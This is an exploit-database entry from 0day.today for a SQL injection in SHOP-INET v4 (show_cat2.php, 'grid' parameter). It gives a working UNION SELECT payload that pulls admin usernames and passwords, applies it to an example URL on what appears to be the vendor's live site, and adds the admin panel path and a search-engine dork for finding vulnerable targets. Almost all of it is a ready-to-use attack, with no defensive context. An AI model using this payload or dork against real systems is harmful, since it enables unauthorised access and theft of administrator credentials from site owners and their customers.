[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SHOP-INET v4 (show_cat2.php grid) SQL Injection Vulnerability

Author
FeDeReR
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4732
Category
web applications
Date add
26-01-2009
Platform
unsorted
=============================================================
SHOP-INET v4 (show_cat2.php grid) SQL Injection Vulnerability
=============================================================


#############################################

Exploit : target.com/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,password)+from+admin

Example :http://shop-inet.ru/shop/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,password)+from+admin

Admin CP: target/admin/

d0rk: inurl:show_cat2.php?grid=

official site: http://shop-inet.ru/

############################################



#  0day.today [2024-11-15]  #